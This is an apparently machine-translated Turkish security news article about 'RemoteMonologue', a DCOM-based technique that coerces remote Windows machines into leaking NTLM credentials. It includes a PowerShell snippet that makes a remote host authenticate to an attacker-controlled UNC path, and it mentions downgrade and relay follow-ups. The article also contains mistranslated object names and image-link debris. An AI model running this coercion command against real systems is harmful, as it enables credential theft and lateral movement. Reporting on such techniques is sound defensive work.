Saldırganların kötü amaçlı yükler dağıtmadan veya yerel Güvenlik Otoritesi Alt Sistem Hizmetine (LSASS) erişmeden NTLM kimlik bilgilerini uzaktan hasat etmelerini sağlayan “RemoteMemonologue” olarak adlandırılan gelişmiş yeni kırmızı ekip tekniği ortaya çıktı.
Geleneksel kimlik hırsızlığı yöntemleri, gelişmiş güvenlik önlemlerinden ve uç nokta tespit ve yanıt (EDR) çözümlerinden artan incelemeyle yüzleştikçe, bu teknik yanal hareket taktiklerinde önemli bir evrimi temsil eder.
Teknik, uzak pencerelerden NTLM kimlik doğrulamasını zorlamak için az kullanılan bileşen nesne modeli (COM) nesneleri ve dağıtılmış muadili, dağıtılmış bileşen nesne modeli (DCOM) üzerinden yararlanır.
.png
)
Remotemonologue, meşru pencereler işlevselliğinden yararlanarak, “arazinin dışında yaşamak” tekniği olarak etkili bir şekilde çalışır ve tespiti geleneksel kimlik bilgisi hasat yöntemlerinden çok daha zor hale getirir.
.webp)
IBM araştırmacıları, bu yeni yaklaşımı Nisan 2025 güvenlik analizlerinde tespit ettiler ve yüklerin hedef sistemde aktarılmasını veya yürütülmesini gerektirmeden kimlik doğrulamasını uzaktan zorlama yeteneğine dikkat çekti.
Bu karakteristik, daha invaziv tekniklerle karşılaştırılabilir sonuçlar elde ederken tespit riskini önemli ölçüde azaltır.
Saldırı, özellikle RunaS kayıt defteri anahtar değerini “etkileşimli kullanıcı” olarak değiştirerek güvenlik ayarlarını manipüle ederek Windows Com nesnelerini kullanıyor.
Bu yapılandırma, DCOM nesnesinin şu anda hedef sistemin konsol oturumuna oturum açtığı kullanıcının güvenlik bağlamı altında yürütülmesine neden olur ve etkilenen kullanıcının kimlik bilgilerini bilmeden oturum kaçırma işlemini etkin bir şekilde mümkün kılar.
Remotemonologue’un arkasındaki teknik mekanizma
Remotemonologe’un temel mekanizması, kimlik doğrulama zorlaması için silahlandırılabilen üç özel DCOM nesnesini odaklar: ServerDataColectorset, FileSystemImage ve Güncellemeler.
.webp)
Her nesne, hedef sistemi saldırgan kontrollü bir sunucuya karşı kimlik doğrulamaya çalışmaya zorlamak için manipüle edilebilen özellikler veya yöntemler içerir.
Örneğin, ServerDataColectorset’in DataMAnager özelliği, iki parametreyi kabul eden bir ekstrakt yöntemi içerir: CabFileName ve HedefsPath.
Saldırgan kontrollü bir sunucuya işaret eden CabFileName için bir UNC yolu sağlayarak, teknik bir NTLM kimlik doğrulama girişimini tetikler:-
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("03837546-098b-11d8-9414-505054503030", "172.22.166.170"))
$a.DataManager.Extract("\\172.22.164.58\john\cena.txt","xforcered").webp)
Saldırı akışı, önce bir DCOM nesnesinin “etkileşimli kullanıcı” olarak RunaS tuşunu ayarlamak için Windows kayıt defterini değiştirmeyi ve ardından DCOM nesnesini uzaktan somutlaştırmayı ve ağ kimlik doğrulamasını tetikleyen yöntemleri veya özellikleri çağırmayı içerir.
Başarılı bir şekilde yürütüldüğünde, bu, oturum açılan kullanıcının hesabını, NTLM kimlik bilgilerini ortaya çıkararak saldırganın sistemine kimlik doğrulamaya zorlar.
Teknik özellikle değerlidir, çünkü LMCompatibilityLevel Kayıt Defteri Anahtarını değiştirerek NetNTLMV1 düşürme saldırıları ile birleştirilebilir ve potansiyel olarak daha basit kimlik bilgisi çatlamasına izin verir.
Ek olarak, yakalanan kimlik bilgileri, etkilenen kullanıcı olarak işlem yapmak için LDAP veya SMB gibi diğer ağ hizmetlerine aktarılabilir, bu da bunu kırmızı ekip cephaneliğine çok yönlü bir katkı haline getirir.
Bu gelişme, savunucular güvenlik duruşlarını güçlendirirken, saldırganları ortak güvenlik kontrollerinden kaçınan giderek daha karmaşık yöntemler bulmaya zorladıkça, kimlik bilgisi hasat tekniklerinin devam eden evrimini vurgulamaktadır.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!